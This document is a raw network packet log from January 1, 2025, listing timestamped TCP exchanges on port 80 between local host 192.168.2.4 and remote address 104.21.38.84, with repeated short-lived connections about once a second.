                                                                                                                                                                                            Jan 1, 2025 14:53:17.486720085 CET8049989104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:17.542912006 CET4998980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:17.640228033 CET8049988104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:17.683479071 CET4998880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:17.728766918 CET8049988104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:17.758821011 CET8049989104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:17.777304888 CET4998880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:17.801592112 CET4998980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:17.885205030 CET4998880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:17.885339022 CET4998980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:17.886013031 CET4999680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:17.890430927 CET8049988104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:17.890489101 CET4998880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:17.890791893 CET8049989104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:17.890851021 CET4998980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:17.890933990 CET8049996104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:17.891000032 CET4999680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:17.891175985 CET4999680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:17.895936012 CET8049996104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:18.246124029 CET4999680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:18.253693104 CET8049996104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:18.353971004 CET8049996104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:18.402267933 CET4999680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:18.618941069 CET8049996104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:18.667819023 CET4999680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:18.739536047 CET5000280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:18.744393110 CET8050002104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:18.744472980 CET5000280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:18.744623899 CET5000280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:18.749448061 CET8050002104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:19.089760065 CET5000280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:19.094616890 CET8050002104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:19.197865009 CET8050002104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:19.245929003 CET5000280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:19.462896109 CET8050002104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:19.511606932 CET5000280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:19.585315943 CET4980680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:19.585480928 CET4979980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:19.585481882 CET4999680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:19.586229086 CET5000280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:19.586952925 CET5000980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:19.591279030 CET8050002104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:19.591326952 CET5000280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:19.591785908 CET8050009104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:19.591850042 CET5000980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:19.591994047 CET5000980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:19.596781015 CET8050009104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:19.949393034 CET5000980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:19.954272032 CET8050009104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:20.055293083 CET8050009104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:20.105338097 CET5000980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:20.314991951 CET8050009104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:20.355334997 CET5000980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:20.428673029 CET5000980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:20.429393053 CET5001680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:20.433708906 CET8050009104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:20.434215069 CET8050016104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:20.434289932 CET5000980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:20.434319973 CET5001680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:20.434406996 CET5001680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:20.439171076 CET8050016104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:20.793019056 CET5001680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:20.797894001 CET8050016104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:20.883064032 CET8050016104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:20.933486938 CET5001680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:21.065653086 CET8050016104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:21.120968103 CET5001680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:21.176136971 CET5001680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:21.176733017 CET5002280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:21.181238890 CET8050016104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:21.181586027 CET8050022104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:21.181663990 CET5001680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:21.181704998 CET5002280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:21.181802988 CET5002280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:21.186634064 CET8050022104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:21.527460098 CET5002280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:21.533258915 CET8050022104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:21.631953955 CET8050022104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:21.683449984 CET5002280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:21.802687883 CET8050022104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:21.855489016 CET5002280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:21.889344931 CET8050022104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:21.933448076 CET5002280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:22.005388021 CET5002280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:22.005999088 CET5002980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:22.010344028 CET8050022104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:22.010416031 CET5002280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:22.010855913 CET8050029104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:22.010978937 CET5002980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:22.011080027 CET5002980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:22.015958071 CET8050029104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:22.355564117 CET5002980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:22.360452890 CET8050029104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:22.458761930 CET8050029104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:22.511674881 CET5002980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:22.635010004 CET8050029104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:22.683469057 CET5002980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:22.736337900 CET5002980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:22.736933947 CET5003480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:22.741400957 CET8050029104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:22.741455078 CET5002980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:22.741811037 CET8050034104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:22.741873026 CET5003480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:22.742400885 CET5003480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:22.747219086 CET8050034104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:22.754527092 CET5003680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:22.754587889 CET5003480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:22.759391069 CET8050036104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:22.759457111 CET5003680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:22.759742975 CET5003680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:22.764627934 CET8050036104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:22.802031040 CET8050034104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:23.095310926 CET8050034104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:23.095432043 CET5003480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:23.105408907 CET5003680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:23.110228062 CET8050036104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:23.213421106 CET8050036104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:23.261581898 CET5003680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:23.479727030 CET8050036104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:23.527205944 CET5003680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:23.598062992 CET5003680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:23.598659039 CET5004280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:23.603130102 CET8050036104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:23.603216887 CET5003680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:23.603485107 CET8050042104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:23.603549957 CET5004280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:23.603698015 CET5004280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:23.608521938 CET8050042104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:23.949152946 CET5004280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:23.954061985 CET8050042104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:24.048075914 CET8050042104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:24.089709997 CET5004280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:24.323241949 CET8050042104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:24.370963097 CET5004280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:24.442123890 CET5004880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:24.446995020 CET8050048104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:24.447093010 CET5004880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:24.447185040 CET5004880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:24.451973915 CET8050048104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:24.792975903 CET5004880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:24.797945976 CET8050048104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:24.909769058 CET8050048104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:24.964709044 CET5004880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:25.082488060 CET8050048104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:25.136610031 CET5004880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:25.191802979 CET5004880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:25.192416906 CET5005380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:25.196891069 CET8050048104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:25.196963072 CET5004880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:25.197247028 CET8050053104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:25.197308064 CET5005380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:25.197386026 CET5005380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:25.202178955 CET8050053104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:25.543051004 CET5005380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:25.547980070 CET8050053104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:25.659749031 CET8050053104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:25.714735031 CET5005380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:25.829822063 CET8050053104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:25.870965958 CET5005380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:25.939379930 CET5004280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:25.944390059 CET5005380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:25.945049047 CET5005880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:25.949418068 CET8050053104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:25.949480057 CET5005380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:25.949883938 CET8050058104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:25.950066090 CET5005880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:25.950170040 CET5005880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:25.954999924 CET8050058104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:26.308656931 CET5005880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:26.313560963 CET8050058104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:26.393954992 CET8050058104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:26.433585882 CET5005880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:26.564632893 CET8050058104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:26.605351925 CET5005880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:26.676403046 CET5005880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:26.677011967 CET5006480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:26.681437969 CET8050058104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:26.681503057 CET5005880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:26.681870937 CET8050064104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:26.681937933 CET5006480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:26.682040930 CET5006480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:26.686855078 CET8050064104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:27.027513027 CET5006480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:27.032471895 CET8050064104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:27.135472059 CET8050064104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:27.183466911 CET5006480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:27.395225048 CET8050064104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:27.449136019 CET5006480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:27.521444082 CET5006480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:27.522036076 CET5007080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:27.526593924 CET8050064104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:27.526911974 CET8050070104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:27.526978016 CET5006480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:27.527008057 CET5007080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:27.527115107 CET5007080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:27.531970024 CET8050070104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:27.779228926 CET5007080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:27.779309988 CET5007280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:27.784176111 CET8050072104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:27.784822941 CET5007280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:27.784956932 CET5007280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:27.789828062 CET8050072104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:27.826028109 CET8050070104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:27.889569044 CET8050070104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:27.889626026 CET5007080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:27.898375034 CET5007480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:27.903239965 CET8050074104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:27.903301954 CET5007480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:27.903424978 CET5007480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:27.908283949 CET8050074104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:28.136714935 CET5007280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:28.141642094 CET8050072104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:28.141737938 CET8050072104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:28.230123997 CET8050072104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:28.261713028 CET5007480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:28.266701937 CET8050074104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:28.277239084 CET5007280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:28.346236944 CET8050074104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:28.402345896 CET5007480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:28.502389908 CET8050072104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:28.543087006 CET5007280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:28.609782934 CET8050074104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:28.652232885 CET5007480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:28.722860098 CET5007280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:28.722873926 CET5007480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:28.723526955 CET5008180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:28.727982044 CET8050072104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:28.728035927 CET5007280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:28.728316069 CET8050074104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:28.728368998 CET5007480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:28.728444099 CET8050081104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:28.728512049 CET5008180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:28.728593111 CET5008180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:28.733419895 CET8050081104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:29.074196100 CET5008180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:29.079346895 CET8050081104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:29.192742109 CET8050081104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:29.246030092 CET5008180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:29.459642887 CET8050081104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:29.511629105 CET5008180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:29.583647966 CET5008780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:29.588591099 CET8050087104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:29.588660955 CET5008780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:29.588741064 CET5008780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:29.593548059 CET8050087104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:29.933598995 CET5008780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:29.938515902 CET8050087104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:30.045011044 CET8050087104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:30.089750051 CET5008780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:30.214221954 CET8050087104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:30.261626005 CET5008780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:30.341866970 CET5008780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:30.342638016 CET5009380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:30.347157001 CET8050087104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:30.347209930 CET5008780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:30.347498894 CET8050093104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:30.347559929 CET5009380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:30.347722054 CET5009380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:30.352581024 CET8050093104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:30.699337006 CET5009380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:30.704269886 CET8050093104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:30.798696041 CET8050093104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:30.839870930 CET5009380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:31.052902937 CET8050093104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:31.105483055 CET5009380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:31.176826954 CET5009380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:31.177400112 CET5010080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:31.181853056 CET8050093104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:31.181910038 CET5009380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:31.182255030 CET8050100104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:31.182312965 CET5010080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:31.182378054 CET5010080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:31.187431097 CET8050100104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:31.527422905 CET5010080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:31.532345057 CET8050100104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:31.648525953 CET8050100104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:31.699121952 CET5010080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:31.950557947 CET8050100104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:31.996018887 CET5010080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:32.086225986 CET8050100104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:32.136653900 CET5010080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:32.206723928 CET5010080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:32.207218885 CET5010780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:32.211961031 CET8050100104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:32.212025881 CET5010080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:32.212058067 CET8050107104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:32.212137938 CET5010780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:32.212224007 CET5010780192.168.2.4104.21.38.84
